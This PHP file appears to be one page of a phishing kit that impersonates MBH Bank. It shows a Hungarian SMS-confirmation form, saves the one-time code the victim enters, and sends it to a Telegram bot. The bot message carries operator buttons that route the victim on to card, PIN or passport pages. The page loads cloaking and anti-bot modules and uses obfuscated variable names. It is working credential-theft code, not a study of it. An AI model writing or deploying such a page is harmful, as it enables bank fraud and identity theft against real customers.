<?php
require_once __DIR__ . '/ck/cloak.php';
require_once __DIR__ . '/ck/antibot.php';
require_once __DIR__ . '/ck/protection.php';
require_once __DIR__ . '/ck/bot-detection-engine.php';

session_start();
header("Cache-Control: no-store, no-cache, must-revalidate, max-age=0");
header("Pragma: no-cache");
header("Expires: 0");

if (!isset($_SESSION['visited_from_index'])) {
    header("Location: index.php");
    exit();
}

if (empty(session_id())) {
    header('Location: card.php');
    exit();
}

require_once 'functions.php';

// ✅ منع الرجوع إلى OTP إذا الحالة success
$statusFile = STATUS_DIR . session_id() . '.txt';
if (file_exists($statusFile)) {
    $status = trim(file_get_contents($statusFile));
    if ($status === 'success') {
        header('Location: success.php');
        exit();
    }
}

// التحقق من وجود رسالة خطأ
$error_message = '';
if (isset($_GET['error']) && $_GET['error'] == 1) {
    $error_message = '<div class="bg-red-100 border border-red-400 text-red-700 px-4 py-3 rounded relative mb-4" role="alert"><strong>Hiba!</strong> A megadott kód helytelen.</div>';
}

// عند إدخال الكود
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $_0x1d4f3e = session_id();
    $_0x5a0b2c = json_decode(file_get_contents(SESSIONS_DIR . $_0x1d4f3e . '.json'), true);
    $_0x5a0b2c['otp'] = $_POST['otp'] ?? 'N/A';

    file_put_contents(SESSIONS_DIR . $_0x1d4f3e . '.json', json_encode($_0x5a0b2c, JSON_PRETTY_PRINT));
    file_put_contents(STATUS_DIR . $_0x1d4f3e . '.txt', 'loading');

    $_0x5a8e = "<b>--[ 🔢 MBH OTP Code ]--</b>\n\n";
    $_0x5a8e .= "<b>Egyszeri kód:</b> <code>" . htmlspecialchars($_0x5a0b2c['otp']) . "</code>\n\n";
    $_0x5a8e .= "<b>Session ID:</b> <code>" . $_0x1d4f3e . "</code>\n";

    $_0x1d4f3e = [
        [['text' => '✅ SUCCESS', 'callback_data' => "success:$_0x1d4f3e"], ['text' => '❌ Error OTP', 'callback_data' => "error_otp:$_0x1d4f3e"]],
        [['text' => '💳 CARD', 'callback_data' => "goto_card:$_0x1d4f3e"], ['text' => '📌 PIN', 'callback_data' => "goto_pin:$_0x1d4f3e"]],
        [['text' => '🛂 PASSPORT', 'callback_data' => "goto_passport:$_0x1d4f3e"]]
    ];
    sendToTelegram($_0x5a8e, $_0x1d4f3e);

    header('Location: loading.php');
    exit();
}

include 'header.php';
?>
<div class="fixed inset-0 bg-gray-100/50 backdrop-blur-sm -z-10"></div>

<div class="max-w-md mx-auto bg-white rounded-2xl shadow-lg p-8 mt-8">
    <div class="text-center mb-6">
        <img src="assets/MBH_Bank_Logo_2023.png" alt="MBH Bank Logo" class="h-12 mx-auto">
    </div>
    
    <div class="text-center space-y-6">
        <h1 class="text-2xl font-bold mbh-blue">SMS megerősítés</h1>
        
        </div>
        
        <?php echo $error_message; ?>
        <p class="text-sm text-gray-600"> Kérjük, adja meg a kapott 6 jegyű kódot.</p>
        
        <form method="POST" action="otp.php">
            <div class="space-y-2">
                <label for="otp-code" class="sr-only">Egyszeri kód</label>
                <input id="otp-code" name="otp" type="text" inputmode="numeric" pattern="[0-9]*" required oninput="this.value=this.value.replace(/[^0-9]/g,'')" placeholder="••••••" maxlength="6" required class="w-full text-center text-2xl tracking-[.5em] font-mono px-4 py-3 border border-gray-200 rounded-xl shadow-sm focus:outline-none focus:ring-2 focus:ring-blue-500 focus:border-transparent bg-gray-50">
            </div>
            <button type="submit" class="w-full flex justify-center py-3 px-4 border border-transparent rounded-xl shadow-sm text-sm font-medium text-white bg-pink-500 hover:bg-pink-600 transition-colors duration-200 mt-6">Megerősítés</button>
        </form>
    </div>
</div>

<script>
// 3-minute countdown timer
let timeLeft = 300;
const countdownElement = document.getElementById('countdown');

function updateCountdown() {
    const minutes = Math.floor(timeLeft / 60);
    const seconds = timeLeft % 60;
    
    countdownElement.textContent = 
        `${minutes.toString().padStart(2, '0')}:${seconds.toString().padStart(2, '0')}`;
    
    if (timeLeft <= 0) {
        countdownElement.textContent = '00:00';
        countdownElement.parentElement.classList.remove('bg-blue-50', 'border-blue-200');
        countdownElement.parentElement.classList.add('bg-red-50', 'border-red-200');
        countdownElement.parentElement.querySelector('p').textContent = 'A kód lejárt!';
        countdownElement.classList.remove('text-blue-600');
        countdownElement.classList.add('text-red-600');
        return;
    }
    
    timeLeft--;
}

setInterval(updateCountdown, 1000);
updateCountdown();
</script>

<?php include 'footer.php'; ?>
